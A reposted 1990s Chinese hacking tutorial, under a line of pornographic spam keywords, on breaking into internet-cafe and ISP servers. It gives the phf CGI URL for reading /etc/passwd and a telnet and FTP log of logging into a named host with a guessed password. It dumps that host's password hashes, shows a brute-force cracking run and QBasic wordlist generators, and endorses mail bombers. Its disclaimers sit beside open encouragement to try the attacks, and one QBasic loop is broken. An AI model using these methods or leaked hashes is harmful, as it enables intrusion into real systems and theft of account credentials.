欧美性猛交黑人xxxx,成人毛片一区二区三区,久久综合九色综合精品,男的把j放进女人下面视频免费

如何破解系統(tǒng)(2)

  • 發(fā)布于:2021-01-05
  • 258 人圍觀
 
話說上次 CoolFire 講到許多的 Net Coffee 店, 安全性之差實在是沒話說,但是過了這麼久也不見有幾家改進(jìn), 可能是想讓自己的電腦被別人玩弄在股掌之間吧, 但可不是每個人都像CoolFire這樣溫和, 如果遇到的是比較狠一點的角色, 那你的 Net Coffee 可能要有一兩天只賣Coffee 而沒辦法再 Net 下去了!!

繼 CoolHC#1 推出後, 有許多人是否已經(jīng)躍躍愈試了呢 ?? 這次咱們不談新的花招,用用之前所講的再來探險一番, 當(dāng)然, 這一次我照往例還是不會使用真正的 Domain Name 來作教學(xué),但是課程中的所有內(nèi)容絕對屬實, 當(dāng)然本次攻擊的對象還是.... Net Coffee Shop....

**談一下 Crack Jack 猜猜密碼

許多人從上一次介紹 Crack Jack 之後就應(yīng)該已經(jīng)領(lǐng)教過它的功力了,但是有幾點需要說明的,
有些人使用 Jack 來幫你尋找 password, 我就當(dāng)你已經(jīng)抓到了沒有 shadow 的 /etc/passwd,
但是為甚麼使用 Jack 還是找不到呢?? 我想你應(yīng)該要換個正點一點的字典檔了, 因為Jack 還
是根據(jù)你所提供的字典檔在尋找, 如果你提供的字典本身就沒有這些字,那當(dāng)然連一個小小帳號
的密碼你都別想猜到了. 數(shù)一下你所使用的字典檔中有多少字 ???我用的字典檔有十九萬多個
字, 你的呢? 是不是小巫見大巫呀 ?? 那麼就趕快充實一下字典檔再重新尋找吧 !!

許多人的密碼都有一定的法則, 我自己寫了 PaSs2DiC 就是將 UserName 由passwd檔轉(zhuǎn)成字典檔的工具, 這是對一些喜歡使用 UserName 當(dāng)作 Password 的人最好的方式,但是也曾經(jīng)好運的找到別人的密碼, 真不曉得"甲"是不是暗戀"乙"才用"乙"的 ID 作為密碼的 ???你可以很簡單的使用Qbasic 來制作 "序數(shù)" 密碼, 或日期密碼, 底下簡單的作一個 0101 (一月一日) 到
1231 的密碼
檔出來:
------------Cut Here MakeDate.BAS -------------------
Open "Dates" for output as #1
for I=1 to 12
for J=1 to 31
I1$=rtrim$(ltrim$str$(I)))
J1$=rtrim$(ltrim$str$(J)))
if len(I1$)=1 then I1$="0"+I1$
if len(J1$)=1 then J1$="0"+J1$
Out$=I1$+J1$
print #1,Out$
next I
next J
close
------------ Cut Here End MakeDate.BAS ----------------
這支小程式將會寫一個 "DATES" 的檔案, 里面就是你要的字典, 當(dāng)然啦,這只是包含月跟日 !!
如果你要猜的密碼是含年份的, 你可能要再增加一些程式碼, 再 Run 一次試試看了,不過這是一個好的開始不是嗎 ??

**如何保護(hù)自己的密碼

談了這麼多的密碼猜法, 當(dāng)然要談一下如何保護(hù)自己的密碼不被破解,
請遵守以下的原則: 

[1]不用生日作為密碼(太容易猜了啦) [2]不用序數(shù)作為密碼(除非你的序數(shù)無限大)
[3]不用身份證字號作為密碼(LetMeIn! 里有猜身份證字號的功能耶)
[4]不用在字典中查得到的字作為密碼.

那麼依照上面的幾點說法, 甚麼樣子的密碼最不容易猜, 自己也最好記呢?? 答案是:用一句有意義的話來作為自己的密碼, 例如: NoOneCanCrackIt 就是一個很難猜的密碼類型,基於這個密碼猜法的原則, 你的密碼是不是要作些更新, 或是大小寫要作一些對調(diào) ?? 如果你的密碼是
coolfire,
建議你最好能改成 CoolFire 或 coolfires (加復(fù)數(shù) "s"),
這樣被猜中的機率就小了很多. 如果你是一個 Hacker, 你的密碼也被人猜中的話... 那...#%%^^^&@

**正式的話題

這次的話題當(dāng)然還是 Crack, 相信許多人已經(jīng)看過 CoolHC#1 了,當(dāng)然眼尖的人可能也已經(jīng) D/L
System Holes 試過了, 你有成功的例子嗎 ?? 如果沒有, 這份 CoolHC#2可能就是你的強心針,
因為這次談的正是 System Holes #1 成功的案例.Step 1. 連線到 "蕃薯藤" 找 "網(wǎng)路咖啡" 找到好多家網(wǎng)路咖啡的 WWW 網(wǎng)址,一一連上去試試看
在 System Holes #1 中的方法可不可行.
Step 2. 若可行則會傳回 /etc/passwd 資訊, 存檔後迅速 Logout, 使用 Crack Jack
解讀!!

[[實例探討]]

System Holes #1 中所介紹的 WWW 入侵法是這樣子的:
http://www.somewhere.com/cgi-bin/nph-test-cgi?* 後再
http://www.somewhere.com/cgi-bin/phf?Qalias=x%0aless%/20/etc/passwd

[1] 用 WWW Browser 連到 yournet.net
[2] Location 輸入 --> "www.yournet.net/cgi-bin/nph-test-cgi?*"
[3] 接著如果出來一份像 Report 的畫面的話, 接著輸入
/cgi-bin/phf?Qalias=x%0aless%20/etc/passwd
[4] 發(fā)生了甚麼事?? etc/passwd 在你的瀏覽器中 "顯示" 出來了 !! 快點 Save 吧
!!

這個方法所用的是系統(tǒng) "檢索" 的漏洞, 不提供這個功能,或是伺服器檢索類型不同的機器則不
會接受這樣的指令, 當(dāng)然也就逃過我們這次的模擬演練啦 !! 但是.... 相信我,你一定會找到一家脫線的網(wǎng)路咖啡, 并沒有像我們一樣每天閱讀 Mail List 的信,對系統(tǒng)安全一點研究也沒有的人不在少數(shù). http://hacker.welcome.com 就是這樣的一個 Net Coffee Shop...呵.... 快來試試吧 !!

當(dāng) CoolFire 抓到 /etc/passwd 後, 立刻存檔, 也馬上斷線, 并且拿出 UltraEdit來瞧一下使用者的資訊, 當(dāng)然這個小 passwd 對 Crack Jack 來說, 實在是不夠看,沒幾分鐘就在我的 486 機器上顯示出來幾個以 UserName 作為 Password 的資訊 (歸功於 PaSs2DiC 及CrackJack 的功勞)不過當(dāng)我試著找尋 root 的密碼時, 一想到我那將近 20 萬字的字典檔,就想到可能花費的時間一定相當(dāng)?shù)捏@人, 於是就以 Jack 的 Option 設(shè)定只尋找 root 那一行, ...(過了良久)... 果不然又是一個笨 root. 用了 "非常" 容易猜的密碼... <--- This is JackAss... 呵!! Got It!

如果你所使用的機器速度不是頂快, 你最好能夠到快一點的機器上使用 Crack Jack,不然你也可以將字典檔切割成幾個小檔案, 然後再分別在幾臺機器上跑, 我目前使用的配備是486DX4-13032MB RAM, 3.2GB HDD, 近 20 萬字的字典檔, 如果在分析較大的 passwd檔時我會將字典檔切割為四至五個小檔 (看有多少臺機器可跑),然後在周末下班前在公司的幾臺機器上分別執(zhí)行 Crack Jack, 等到禮拜一上班時就等著接收成果了! 當(dāng)然如果你只有一臺機器, passwd檔又很大的話,由於 Crack Jack 無法於 Windoz 95 下使用, 你可能只能犧升時間或機器來跑了!再沒有辦法的話, 亦可使用單機多工, 多開幾個 DOS Box 來跑 Brute, 也許也是一個可行的辦法!

**後語

有許多人在使用 Crack Jack 的時候有許多問題, 不過看了 CoolHC#1 應(yīng)該都解決了吧?? 最近大家問的比較多的是 UpYours 3.0, 雖然已經(jīng)改進(jìn)了 Install 的問題,不過大家的問題還是都出在Winsck.ocx 上面, 有人說裝了 MSICP Beta 會好 ?? 但也有實例裝了也還不能 Run 的,
在此建議大家不要再玩 MailBomb 了, 雖然我喜歡收集這種東西, 但還是少亂炸為妙,已經(jīng)證實有許多常用的 MailBomb 沒有辦法 Fake IP 了 !! 所以... 如果 UpYours 3.0裝不起來的人就試試 KaBoom!V3.0 吧 ! 雖然沒有辦法 Fake IP (選錯 Mail Server 的話), 但是也是一個不錯的AnonyMailer如果要發(fā)匿名信, 現(xiàn)在首頁上有可以幫你發(fā)信的 Mailer, 會安全一點.

如果你仍舊對 UpYours 3.0 不死心, 就試試 ResSvr32.exe (Under Windows/systemrectory),
看看能不能將 WinSck.ocx 裝上了... 記得先 UnReg 再 Reg...

在此建議大家可以多訂閱一些 "系統(tǒng)安全" 討論的 Mail List或多參考一些已經(jīng)被找出來的系統(tǒng)漏洞, 因為有些人對這些方面并不是很重視, 所以這些資訊也就顯得格外的重要了,如果能夠多參考一些資訊, 在你入侵的時候會有很大的幫助, 當(dāng)然, 如果你能作出一份列表出來,放在手邊參考的話, 就可以快速的; 安全的入侵了!! 下一次所談的是 SendMail 的 Bug 實例,在這中間當(dāng)然照往例會先出一份 System Holes #2 來作為資料. 如果有興趣的人在 SH#2出來的時候可以先研究看看. 下次見! Merry X'Mas..... & Happy New Year.......

------
上次講的 Home Page 建置案還沒搞完, 沒有充實一下 Home Page 實在是對不起大家,所以利用一點時間寫了 CoolHC#2, 可能報告又交不出來了 !! 老話,如果你有興趣寫其它程式的中文說明, 請完成後寄一份給我, 我將它放在 Home Page 上面讓其它人參考,當(dāng)然你也可以給我你的使用心得, 讓別人參考看看也行! 目前準(zhǔn)備收集一系列的 System Hole List,如果你在其它的站臺有看到的, 請把它先 Cut 下來, Mail 一份給我 !

------
再次重申, Crack 別人站臺之後不要破壞別人站臺中的資料, 此篇文章僅作為教育目的,不主張你隨便入侵他人主機.... (高-Net 還是除外)... 請勿將這類技術(shù)使用於破壞上 (又...如果第三次世界大戰(zhàn)開打, 你可以任意破壞敵國的電腦網(wǎng)路... 我全力支持),最嚴(yán)重的情況(如果你真的很討厭該主機的話)... 就將它 Shut Down.... 好了! 別太暴力了!

                                                                        



這不是一個教學(xué)文件, 只是告訴你該如何破解系統(tǒng),好讓你能夠?qū)⒆约旱南到y(tǒng)作安全的保護(hù), 如果你能夠?qū)⑦@份文件完全看完, 你就能夠知道電腦駭客們是如何入侵你的電腦, 我是 CoolFire, 寫這篇文章的目的是要讓大家明白電腦安全的重要性, 并不是教人 Crack Password若有人因此文件導(dǎo)致惡意入侵別人的電腦或網(wǎng)路, 本人概不負(fù)責(zé) !!

前幾次說到了 Net Coffee 店, 還好他們沒有提供客戶撥接上線的功能,不然密碼或是帳號被人盜用的客戶不就糗大了! 但是 CoolFire 在這兩周的探險中, 為了找一個酷似網(wǎng)路咖啡站臺的
W3 密碼,誤入一個號稱第一個提供網(wǎng)路撥接的 ISP, 且在 CoolFire 順利的抓回 /etc/passwd
之後, 使用了自己寫的 PaSs2DiC + CJack 來解出密碼, 沒想到不用 1 分鐘, 就找出了 9 組 ID 與Password 相同的密碼,勿怪我沒有在這里提醒大家, 還好我沒有找到 root password, 不然可能該系統(tǒng)就此停擺,不可再見天日也! (當(dāng)然我不可能這麼作啦!).

看看最近興起的網(wǎng)路咖啡及各大網(wǎng)站的系統(tǒng)安全設(shè)施, 再加上 CoolFire最近開會的時候遇到的情況, 不難發(fā)現(xiàn)我們的國家正往高科技的領(lǐng)域快步邁進(jìn), 但是這些系統(tǒng)的安全性若不加強,可能到時候人家只要一臺電腦再加上一臺數(shù)據(jù)機就可以讓整個國家的金融及工商業(yè)崩潰!
大家要小心呀 !
ISP 是一般 User 撥接的源頭, 技術(shù)上理應(yīng)比較強, 但還是輕易讓人入侵, 且又沒有教導(dǎo)User 正確的網(wǎng)路使用觀念 (Password 的設(shè)定及 proxy 的使用等),實在不敢想像這樣的網(wǎng)路發(fā)展到幾年後會是甚麼樣子 ??

這一次的說明還是沒有談到新的技巧, 在 James將首頁更新後各位應(yīng)該已經(jīng)可以從中學(xué)到許多東西了, 如果想要學(xué)習(xí)入侵, 就一定要知道最新的資訊 (入侵本國的網(wǎng)路則不用,反正沒人重視網(wǎng)路安全..... 真失望), 在別人還沒將 Bug 修正之前就搶先一步拿到 /etc/passwd,所以訂閱一些網(wǎng)路安全的 Mail List 是必要的, 多看一些網(wǎng)安有關(guān)的 News Group 也是必要的 (不僅 Hacker如此, ISP 更要多注意這些資訊!). 日後有空再整里一些 Mail List 給大家 !!

本次主題: 說明如何連接該 ISP 并且對其 /etc/passwd 解碼連接位址: www.coffee.com.tw (203.66.169.11)特別說明: 由於本次主題說明重點使用真實的位址及名稱, 所以 CoolFire 已經(jīng) Mail給該網(wǎng)頁之維護(hù)人員更改密碼, 但該網(wǎng)頁之 ISP 仍為新手之練習(xí)好題材! CoolFire
Mail 給該網(wǎng)頁維護(hù)人員之信件內(nèi)容如下, 如果他還不盡快改掉, 我也沒辦法了!

Mail sent to dhacme@tp.globalnet.com.tw:
Subject: 請速更動網(wǎng)頁密碼
From: CoolFire <coolfires@hotmail.com>

你的網(wǎng)頁作得不錯, 但是因為你所設(shè)定的密碼太容易為駭客所? 入侵, 請於見到此信後速速更改你的網(wǎng)頁進(jìn)入密碼, 否則下次若網(wǎng)頁遭到篡改, 本人概不負(fù)責(zé)!!

**** 課程開始 ****

請注意: 由於本次所作的課程內(nèi)容以實作為主, 除了本人 IP 有所更改,一切都使用本人所用之
Telnet 軟體 Log 檔收錄, 故若道德感不佳者請勿閱讀以下之詳細(xì)破解內(nèi)容,否則本人概不負(fù)責(zé)!

(連線到某一主機之後.... 此處的 ms.hinet.net.tw 是假的 Domain name)
ms.hinet.net.tw> telnet www.coffee.com.tw
Trying 203.66.169.11...
Connected to www.coffee.com.tw.
Escape character is '^]'.
Password: (隨便按一下 Enter)
Login incorrect

www login: coffee (以 Hacker 的敏銳判斷 username=coffee password=coffee)
Password:
Last login: Thu Jan 9 10:41:52 from ms.hinet.net.tw

歡 迎 光 臨 ....... 以下略! 因涉及該 ISP 的名譽, 大家自己去看吧!
=================================================================

(直接進(jìn)入核心部份)
www:~$ cd /etc
www:/etc$ ls
DIR_COLORS hosts.equiv printcap
HOSTNAME hosts.lpd profile
NETWORKING inet@ protocols
NNTP_INEWS_DOMAIN inetd.conf psdevtab
X11@ inittab rc.d/
at.deny inittab.gettyps.sample resolv.conf
bootptab ioctl.save rpc
csh.cshrc issue securetty
csh.login issue.net securetty.old
default/ klogd.pid sendmail.cf
diphosts ld.so.cache sendmail.st
exports ld.so.conf services
fastboot lilo/ shells
fdprm lilo.conf shutdownpid
fs/ localtime skel/
fstab magic slip.hosts
ftp.banner mail.rc slip.login
ftp.deny motd snooptab
ftpaccess motd.bak sudoers
ftpconversions msgs/ syslog.conf
ftpgroups mtab syslog.pid
ftpusers mtools termcap
gateways named.boot ttys
gettydefs networks utmp@
group nntpserver vga/
host.conf passwd wtmp@
hosts passwd.OLD yp.conf.example
hosts.allow passwd.old
hosts.deny ppp/

(看看我們的目標(biāo)長得如何???)
www:/etc$ cat passwd
root:abcdefghijklmn:0:0:root:/root:/bin/bash
bin:*:1:1:bin:/bin:
daemon:*:2:2:daemon:/sbin:
adm:*:3:4:adm:/var/adm:
lp:*:4:7:lp:/var/spool/lpd:
sync:*:5:0:sync:/sbin:/bin/sync
shutdown:*:6:0:shutdown:/sbin:/sbin/shutdown
halt:*:7:0:halt:/sbin:/sbin/halt
mail:*:8:12:mail:/var/spool/mail:
news:*:9:13:news:/usr/lib/news:
uucp:*:10:14:uucp:/var/spool/uucppublic:
operator:*:11:0:operator:/root:/bin/bash
games:*:12:100:games:/usr/games:
man:*:13:15:man:/usr/man:
postmaster:*:14:12:postmaster:/var/spool/mail:/bin/bash
nobody:*:-1:100:nobody:/dev/null:
ftp:*:404:1::/home/ftp:/bin/bash
guest:*:405:100:guest:/dev/null:/dev/null
shan:Ca3LGA8gqDV4A:501:20:Shan Huang:/home/staff/shan:/bin/bash
www:/U5N5/l0B.jWo:502:20:WWW Manager:/home/staff/www:/bin/bash
test:aFoIbr40sdbiSw:503:100:test:/home/test:/bin/bash
fax:aHhi5ZoJwWOGtc:504:100:FAX_SERVICE:/home/staff/fax:/bin/bash
women:IiO94G5YrrFfU:505:100:Perfect Women:/home/w3/women:/bin/bash
kanglin:aMjy/8maF4ZPHA:506:100:Kanglin:/home/w3/kanglin:/bin/bash
coffee:AlwDa18Au9IPg:507:100:Coffee:/home/w3/coffee:/bin/bash
bakery:aFm7GUGCuyfP2w:508:100:Bakery:/home/w3/bakery:/bin/bash
carven:aPaqr3QAdw8zbk:509:100:Carven:/home/w3/carven:/bin/bash
haurey:/2m87VjXC742s:510:100:Haurey:/home/w3/haurey:/bin/bash
prime:nPOlsQhQFJ.aM:511:100:Prime:/home/w3/prime:/bin/bash
tham:H2AOlPozwIIuo:512:100:xxxxxxxxxx:/home/w3/tham:/bin/bash
ccc:aFiKAE2saiJCMo:513:100:ccc:/home/w3/ccc:/bin/bash
sk:UPrcTmnVSkd3w:514:100:sk:/home/sk:/bin/bash
services:9yBqHWfnnNr.k:515:100:xxxx:/home/w3/haurey/services:/bin/bash
order:LpnMHVjy9M/YU:516:100:xxxx:/home/w3/haurey/order:/bin/bash
corey:mhRsFO60hFsMU:517:100:xxxx:/home/w3/haurey/corey:/bin/bash
richard:EmUWnU6Bj7hQI:519:100:richard:/home/w3/richard:/bin/bash
lilian:Opx5xwctJTO1A:520:100:lilian:/home/w3/lilian:/bin/bash
support:JdOqvTZqdZ9wQ:521:100:support:/home/w3/support:/bin/bash
hotline:BiSzCJsDhVl7c:522:100:hotline:/home/w3/hotline:/bin/bash
stonny:/UNPsb9La4nwI:523:20::/home/staff/stonny:/bin/csh
bear:w/eF/cZ32oMho:524:100:bear:/home/w3/bear:/bin/bash
lance:Pf7USG6iwgBEI:525:20:Chien-chia Lan:/home/staff/lance:/bin/tcsh
taiwankk:ijPWXFmRF79RY:526:100:hotline:/home/w3/taiwankk:/bin/bash
service:ulfWaOzIHC.M.:527:100:prime service:/home/w3/service:/bin/bash
liheng:6hGixt6Kgezmo:528:100:prime liheng:/home/w3/liheng:/bin/bash
caves:RyvviMcWTTRnc:529:100:gallery:/home/w3/caves:/bin/bash
sales:CmtV4FZsBIPvQ:518:100:prime:/home/w3/prime/sales:/bin/bash
kingtel:8E7f0PIQWfCmQ:530:100:kingtel:/home/w3/kingtel:/bin/bash
recycle1:JgbZHVRE4Jf3U:531:100:recycle1:/home/w3/recycle1:/bin/bash
recycle2:Qg85xgdnsqJYM:532:100:recycle2:/home/w3/recycle2:/bin/bash
recycle3:XhyoUBFQspiS2:533:100:recycle3:/home/w3/recycle3:/bin/bash
recycle:109mNZYIZtNEM:534:100:recycle:/home/w3/recycle:/bin/bash
hxnet:KhB./jHw.XNUI:536:100:hxnet:/home/w3/hxnet:/bin/bash
goodbook:MlD0tx.urQMYc:535:100:goodbook:/home/w3/goodbook:/bin/bash
sales1:JmKzPOBMIIYUI:537:100:sales1:/home/w3/prime/sales1:/bin/bash
rwu:Pai8mYCRQwvcs:539:100:rwu:/home/w3/kingtel/rwu:/bin/bash
charliex:Of6HaxdxkDBDw:540:100:charliex:/home/w3/kingtel/charliex:/bin/bash
jdlee:Mhq3gZNup9E3Q:538:100:jdlee:/home/w3/kingtel/jdlee:/bin/bash
tkchen:GkTU8ecYIXEyw:541:100:tkchen:/home/w3/kingtel/tkchen:/bin/bash
slb:Olf22.gHBZ.QQ:542:100:slb:/home/w3/kingtel/slb:/bin/bash
s6t4:GnHFCPdZX7nkU:543:100:s6t4:/home/w3/kingtel/s6t4:/bin/bash
lsh:GftygyOntHY6Y:545:100:lsh:/home/w3/kingtel/lsh:/bin/bash
lilly:DhKHmlKPE6tRk:544:100:lilly:/home/w3/kingtel/lilly:/bin/bash
nalcom:MhHdQ1mvge9WQ:546:100:nalcom:/home/w3/prime/nalcom:/bin/bash
jordon:mPgNPVEkIEORM:547:100:jordon:/home/w3/jordon:/bin/bash
toonfish:wTscIuas4EeTE:548:100:toonfish:/home/w3/toonfish:/bin/bash
yahoo:If.UlNFTal.bk:549:100:yahoo:/home/w3/yahoo:/bin/bash
basic:IgLUu9J03lbyU:550:100:basic:/home/w3/basic:/bin/bash
wunan:QUHEiPefAaKsU:551:100:xxxxxxxx:/home/w3/wunan:/bin/bash
kaoune:eVwM44uTLOpnY:552:100:kaoune:/home/w3/wunan/kaoune:/bin/bash
shuchuan:KgPlk7TT6pmBk:553:100:shuchuan:/home/w3/wunan/shuchuan:/bin/bash
fan:Jk6E9PqP7xemg:554:100:fan:/home/w3/toonfish/fan:/bin/bash

(CoolFire 注: 因為使用 PaSs2DiC 很容易找出 ID 與 Password 相同的. 故除了 Coffee外, 其它我找到密碼的 EnCode Password 部份皆改過..... 除非你一個一個試?yán)瞺~~ 我沒說喔!)

www:/etc$ exit
logout
Connection closed by foreign host.

(可以走了 !! 改用 FTP 將 /etc/passwd 給抓回來吧!)

ms.hinet.net.tw> ftp www.coffee.com.tw
Connected to www.coffee.com.tw.
220-
220- 歡 迎 光 臨 ....... 以下略! 因涉及該 ISP 的名譽, 大家自己去看吧!
220-
220-
220- There are 0 users in FTP Server now.
220- 目前已有 0 使用者在此 Server 上.
220- If you have any suggestion, please mail to:
220- service@xx.xxxxxxx.xxx.xx.
220-
220-
220-
220 www FTP server (Version wu-2.4(1) Tue Aug 8 15:50:43 CDT 1995) ready.

(還是使用剛剛的帳號進(jìn)入)

Name (www.coffee.com.tw:YourName): coffee
331 Password required for coffee.
Password:
230 User coffee logged in.
Remote system type is UNIX.
Using binary mode to transfer files.

(直接到達(dá)檔案放置地點)

ftp> cd /etc
250 CWD command successful.
ftp> ls
200 PORT command successful.
150 Opening ASCII mode data connection for file list.
ttys
fdprm
group
issue
motd
mtools
profile
securetty
shells
termcap
skel
csh.cshrc
csh.login
lilo
inet
default
services
HOSTNAME
DIR_COLORS
passwd
passwd.OLD
wtmp
utmp
gettydefs
inittab.gettyps.sample
ld.so.conf
ld.so.cache
at.deny
fs
magic
rc.d
syslog.conf
printcap
inittab
sudoers
vga
diphosts
mail.rc
ppp
NNTP_INEWS_DOMAIN
sendmail.st
NETWORKING
gateways
bootptab
exports
ftpusers
host.conf
hosts
hosts.allow
hosts.deny
hosts.equiv
inetd.conf
named.boot
networks
nntpserver
protocols
resolv.conf
rpc
ftpaccess
hosts.lpd
ftpconversions
snooptab
msgs
ftpgroups
slip.login
slip.hosts
yp.conf.example
X11
lilo.conf
sendmail.cf
fstab
fastboot
mtab
syslog.pid
klogd.pid
shutdownpid
localtime
passwd.old
ioctl.save
psdevtab
ftp.banner
ftp.deny
issue.net
motd.bak
securetty.old
226 Transfer complete.

(取回該檔案)

ftp> get passwd
200 PORT command successful.
150 Opening BINARY mode data connection for passwd (4081 bytes).
226 Transfer complete.
4081 bytes received in 2.5 seconds (1.6 Kbytes/s)

(盡速離開)

ftp> bye
221 Goodbye.

好了! 有了 /etc/passwd 之後一切都好辦了, 趕緊將你的寶貝收藏 PaSs2DiC 拿出來吧
!!快點跑一下, 讓它自動產(chǎn)生字典檔案:

C:\hack>pass2dic
PaSs2DiC V0.2 (C)1996 By FETAG Software Development Co. R.O.C. TAIWAN.

This tool will:

[1] Load PASSWD file and convert it to only username text file
[2] Write the file to a dictionary file you choise for target

Your Source PASSWD File Name: passwd
Your Target Dictionary Name: dic.cfe

PaSs2DiC Author: James Lin E-Mail: fetag@stsvr.showtower.com.tw
FETAG Software Development Co: http://www.showtower.com.tw/~fetag

C:\hack>

(這樣就好了 ! 自動產(chǎn)生的檔案會放在 dic.cfe 這個檔案中, 咱們跑一下 Brute Force看看!)


C:\hack>fbrute passwd @dic.cfe

BRUTE!, Unix Brute Force Hacking Routine. v2.0
Copyright (C) 1990, Prometheus. DOS-fastcrypt made available by sir hackalot.
闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡

                                       
Attempts/Hits: 5184/9
                                       

Taking list input from dic.cfe
Beginning search of passwd for password: xxx

Match for password xxxxxx found! Username: xxxxxx
Match for password xxxxx found! Username: xxxxx
Match for password xxx found! Username: xxx
Match for password xxxxxx found! Username: xxxxxx
Match for password xxxxxx found! Username: xxxxxx
Match for password coffee found! Username: coffee
Match for password xxxxxxx found! Username: xxxxxxx
Match for password xxx found! Username: xxx
Match for password xxxx found! Username: xxxx

Done.

C:\hack>

看! 除了 coffee 外還是有許多人使用與 ID 相同的字作為密碼, 實在是....@#$%^...&*因某些關(guān)系所以其它部份要被 "馬賽克" 起來, 請各位讀者見量!

**** 再談密碼 ****

看了以上的破解示范, 就可以了解到許多人還是對於 "密碼" 這東西不是很有 "密碼"的觀念, 人就是那麼的懶, 隨便設(shè)定一個好記的, 但是這種密碼確是最不安全的, 上次我們談到如何用
QBasic 來設(shè)計一個自動產(chǎn)生密碼的小程式, 相信對許多人有很大的幫助,底下我們再來淺顯的介紹一下字母密碼的產(chǎn)生方法, 相信對於你在 Hack 某站會有更大的幫助.

事情的開始是有一位網(wǎng)友 mail 給我, 問我字典檔要如何寫程式來 "自動擴大",而讓我有了寫這一段的想法, 現(xiàn)在我就針對這位網(wǎng)友的問題作一個更詳細(xì)的說明 (因已簡短回信答覆),并且寫出來讓大家了解一下, 當(dāng)然我們的示范還是使用 QBasic, 因為這是最容易找到的程式了,而且語法大家也可能會比較熟悉一點, 如果我使用 VB 或 C 來寫, 可能有些人只會拿去用,而不會去修改或者寫個好一點的出來!

先說明一下原理好了: 我們所要作的程式是一個自動產(chǎn)生字典檔的程式,所以我們要了解字的字母排列到底有哪些方法可循?? 我們先舉幾個簡單的單字出來比較看看:

[1] apple [2] guest [3] james [4] superman [5] password

OK! 來看看! 如果你有一點英文的概念的話應(yīng)該會知道母音及子音吧 !
我們首先這樣說明: 母音在英文
上有 : A E I O U 這五個, 所有的英文單字都會有這些母音(有些沒有的可能是專有名詞或縮寫), 也有可能是雙母音的字, 如: au, ai, ea, ei, ia, ie, ou, oe, ui, ua... 等,
再來就是比較每個字的開頭, 有可能是母音,也有可能是子音, 但是子音之後通常接的是母音字母, 但是也有例外, 如: student是兩個子音再接一個母音字母, 所以接下來依照常用字將這些子音找出來, 我想了一下大概有: br, bl, cl, dg,dr, fl, gr, kn, ph, st, sp, wh .... 等幾種(其它請自行統(tǒng)計), 然後是結(jié)尾部份, 通常結(jié)尾部分有下列幾種: e;est; ord; ard; ls; es; s...等好多好多, 我們稍為思考一下就知道要如何寫出這樣的程式出來了 !!
我大略寫一個簡單的, 其它大家自行發(fā)揮, 如果有人學(xué)語言學(xué)的, 請幫忙弄一份常用組合表出來, 可能會更有幫助吧 !!

底下就是該程式片段, 執(zhí)行後會產(chǎn)生 MyDic.Txt 檔, 大小為: 22,096 Bytes 共有 3120個字的字典!!

--------------- MakeDic.BAS Start Here
-------------------------------------------------------------------------------
--------
DIM FirstWord$(20)
DIM MotherWord$(13)
DIM LastWord$(12)

DATA "br", "bl", "cl", "dg", "dr", "fl", "gr", "kn", "ph", "st", "sp", "s",
"t", "p", "k" , "f", "m", "n", "b","k"
DATA "a", "e", "i", "o", "u", "ai", "ei", "ea", "io", "ou", "oi", "au", "eo"
DATA "st", "ord", "ard", "e", "es", "le", "ng", "st", "ing", "n", "b", "s"

FOR I = 1 TO 20
READ FirstWord$(I)
PRINT FirstWord$(I)
NEXT I

FOR I = 1 TO 13
READ MotherWord$(I)
NEXT I

FOR I = 1 TO 12
READ LastWord$(I)
NEXT I

OPEN "MyDic.txt" FOR OUTPUT AS #1

FOR I = 1 TO 20
FOR J = 1 TO 13
FOR K = 1 TO 12
PRINT #1, FirstWord$(I) + MotherWord$(J) + LastWord$(K)
NEXT K
NEXT J
NEXT I

CLOSE : END
--------------- Cut Here, End of MakeDic.BAS
-------------------------------------------------------------------------------
-

當(dāng)然這只是小部份的組合, 相信你可以作出一個更大的字典檔出來, 如:
子音+母音+子音+母音+子音, 作出來的字典檔會很嚇人喔 !! 這一個部份就講到這里了 ! 如果你有很棒的字典產(chǎn)生程式,寫好了請 Mail 一份給我喔 !! 如果可以的話請說明是否可以公布在我的 W3 上讓其它人下載 !!還是你只是要給我 ?!

希望每次講到密碼的問題後, 大家可以將這些密碼的產(chǎn)生方法與自己的密碼對照看看,如果有相同的請趕緊將自己的密碼換掉, 我講得口沫橫飛, 都沒有人要聽嗎 ??? 咖啡業(yè)者...... ISP
們.... 教教你們的使用者吧..... 唉~~~~


**** 後語 ****

我們的首頁感謝大家的支持, 現(xiàn)在人數(shù)已經(jīng)到達(dá) 2,000 了, 這是一個地下站(未對外正式公布) 很棒的一個數(shù)字, 在與其它工作室人員研究之後, 暫時不對外公布站址, 如果你是 "誤闖"到本站來的! 我們歡迎你的加入, 但目前尚不考慮對外公布站址, 請您在告訴你的朋友有這麼一個站存在的時候,請他不要隨便告訴別人 (請只告訴你信賴的朋友; 或?qū)﹄娔X有一份特別狂熱的人, 我們都?xì)g迎他們的加入),我們目前所采用的方式將是開放式的! 對首頁部份暫時不以密碼方式處理.

** 不要 Crack 這個首頁的 ISP!!!! 否則 FETAG Sofeware's Hacking Page將會完全關(guān)閉, 再也不尋找其它的地方來放置, 希望給你的是使用電腦的 "知識", 不要利用它來奪取任何的 "權(quán)利",本首頁著重的是教育, 而不是一 的教導(dǎo)攻擊的方法, 希望大家對於政府機關(guān) (org.tw) 或教育機構(gòu) (edu.tw)不要作任何的破壞!!還有我的 ISP......:D

------
哇! 一份案子搞了好久, 都沒時間維護(hù)網(wǎng)頁了, 所以特別將維護(hù)的工作還給了 James,希望大家多多支持我們的園地, 我案子搞完後再跟大家談?wù)勎易罱膶崙?zhàn)故事! 雖然沒時間寫網(wǎng)頁,但是還是會寫一些文件給大家作為參考 !!

------
再次重申, Crack 別人站臺之後不要破壞別人站臺中的資料, 此篇文章僅作為教育目的,不主張你隨便入侵他人主機.... (高-Net 還是除外)... 請勿將這類技術(shù)使用於破壞上 (又...如果第三次世界大戰(zhàn)開打, 你可以任意破壞敵國的電腦網(wǎng)路... 我全力支持),最嚴(yán)重的情況(如果你真的很討厭該主機的話)... 就將它 Shut Down.... 好了! 別太暴力了!

萬企互聯(lián)
標(biāo)簽: